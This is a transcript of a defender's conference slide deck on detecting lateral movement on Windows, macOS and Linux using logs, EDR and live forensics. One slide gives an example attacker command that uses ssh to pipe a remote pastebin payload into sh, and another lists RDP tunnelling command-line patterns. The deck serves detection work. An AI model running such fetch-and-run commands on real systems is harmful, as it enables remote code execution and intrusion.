Spotting Lateral Movement with Endpoint Data

Transcript

1. Spotting Lateral Movement Using Endpoint Data

2. Tony Lambert Evil Finder, Red Canary Yo Detection & analysis

   at Red Canary Recovering sysadmin Loves to teach, hates to grade homework $env:UserName @ForensicITGuy
3. None

4. What the admin sees... Malicious movement

5. What’s endpoint data anyways? Lateral Movement Techniques • Windows Admin

   Shares • Windows Remote Management • Remote Desktop Protocol • Pass the Hash • Exploitation of Remote Services • Remote Services Overview

6. Log Data Strengths Everything has ‘em! So many options! Integrated

   with systems Weaknesses So much data! Easy to misconfigure

7. Endpoint Detection & Response Strengths Flight recorder for computers Process

   metadata Happy medium Weaknesses Hard to manage Doesn’t get content Mostly for processes only

8. Live Forensics Tools Strengths Full content Lots of visibility Weaknesses

   Hard to scale Hard to spot ephemeral things Lots of human correlation

9. Windows Admin Shares

10. Windows Admin Shares • Hidden network shares for admins •

    Copy files & schedule execution • ADMIN$ == %SystemRoot% == C:\Windows \\win10-pc\ADMIN$

11. Windows Admin Shares - Copy • Logs ◦ 5140 -

    Network Share Accessed ◦ 5145 - Network Share Access Checked ◦ 4624 - Account Logged On (Type 3)

12. Windows Admin Shares - Service • Logs ◦ 7045 -

    New Service • EDR ◦ parent process == services.exe ◦ path == System32 OR sysWOW64 ◦ Start with Unsigned

13. Windows Admin Shares - Copy/Service • Live Forensics ◦ New

    files in C:\Windows (NTFS Entry Number) ◦ Services in Registry (HKLM\SYSTEM\CurrentControlSet\Services)

14. Windows Remote Management

15. Windows Remote Management • Lets you admin all the systems

    • WinRM configures, can also call WMI • WinRS issues remote commands • WMI does a little of everything • PowerShell Remoting stands on all the previous tools

16. Windows Remote Mgmt - WinRS • Logs ◦ ID 169

    - User authenticating to WinRM service ◦ ID 4624 - User Logged On (Logon Type 3) • EDR ◦ Receiver parent process == winrshost.exe ◦ Sender process == winrs.exe -r:

17. Windows Remote Mgmt - WMI • Logs ◦ ID 5857

    - WMI Activity StartedOperational ◦ ID 4624 - User Logged On (Logon Type 3 & 5) • EDR ◦ Receiver parent process == wmiprvse.exe ◦ Sender process == wmic.exe /node:

18. Windows Remote Mgmt - PSRemoting • Logs ◦ ID 4104

    - Suspicious PS Script Block ◦ ID 4624 - User Logged On (Logon Type 3) • EDR ◦ Receiver parent process == wsmprovhost.exe ◦ Sender process == powershell.exe OR pwsh.exe

19. Windows Remote Mgmt • Live Forensics ◦ Relies heavily on

    mature logs and process auditing ◦ Process execution artifacts (Prefetch, etc…) ◦ PowerShell transcripts, ConsoleHost_history.txt

20. Remote Desktop Protocol

21. Remote Desktop Protocol • Admin with a GUI • Shares

    clipboard, printers, disks, etc… • Often used for a desktop experience

22. Remote Desktop Protocol • Logs ◦ ID 1149 - Successful

    RDP Remote Connection ◦ ID 4624 - User Logged On (Logon Type 10 or 7) • EDR ◦ Telltale processes == rdpclip.exe ◦ Sender process == mstsc.exe

23. Remote Desktop Protocol - Activity • EDR ◦ Parent processes

    == explorer.exe, cmd.exe, etc. • Live Forensics ◦ Prefetch parsing ◦ User activity forensics like local logon

24. RDP Tunnelling • EDR ◦ plink.exe AND cmdline includes 127.0.0.1:3389

    ◦ netsh.exe AND cmdline includes connectp AND 3389 • Live Forensics ◦ HKCU\SYSTEM\CurrentControlSet\Services\PortProxy ◦ Artifacts of plink.exe execution

25. Pass the Hash

26. Pass the Hash • Authentication using NTLM hashes • No

    cleartext password • Mitigate with Win10 Credential Guard • Mitigate with Domain Protected Users group

27. Pass the Hash • Logs ◦ ID 4672 - Special

    Privileges Logon ◦ ID 4624 - User Logged On (Logon Type 3 or 9) ◦ Not a domain logon ◦ Not the ANONYMOUS LOGON account

28. Pass the Hash • EDR ◦ Doesn’t know the difference

    • Live Forensics ◦ Grab the local logs ◦ Credential theft tools and material on disk ◦ Otherwise normal user activity

29. Exploitation of Remote Services

30. Exploitation of Remote Services • On Windows, primarily Server Message

    Block (SMB) • Exploits like MS17-010 SMB Remote Code Execution ◦ “ETERNALBLUE”

31. Exploitation of Remote Services • Logs ◦ Depending on exploit,

    sparse logging ◦ Code injection (if you have Sysmon) • EDR ◦ Abnormal parent/child relationships ◦ lsass.exe spawning child processes

32. Exploitation of Remote Services • Live forensics ◦ Evidence of

    code injection (memory forensics) ◦ Exploit code left on system

33. Remote Services

34. Remote Services • On Windows, SMB • On macOS &

    Linux, SSH & VNC • Using services designed for remote connections • Not always associated with remote administration

35. Exploitation of Remote Services • Logs ◦ Depends on service

    ◦ SSH - /var/log/secure (RHEL) /var/log/auth.log (Debian) • EDR ◦ Child processes of SSHD and VNC daemons ◦ “ssh” commands with suspicious command lines

36. Exploitation of Remote Services ssh … [email protected] '(curl hxxps://pastebin.com/payload |

    sh'

37. Exploitation of Remote Services • Live Forensics ◦ Recovering logs

    ◦ Filesystem artifacts correlated with logon ◦ Shell history

38. KEY TAKEAWAY You can find lateral movement with endpoint data

    sources.

39. Special thanks to: Michael Gough @hackerhurricane Carlos Perez @darkoperator JP-CERT

    @jpcert_en Matt Graeber @mattifestation MITRE ATT&CK @MITREattack SANS DFIR @sansforensics Matthew Dunwood @matthewdunwoody FireEye @fireeye Jonathon Poling @JPoForenso STEALTHbits @STEALTHbits

40. Subscribe to the Red Canary blog: redcanary.com/blog Visit our booth!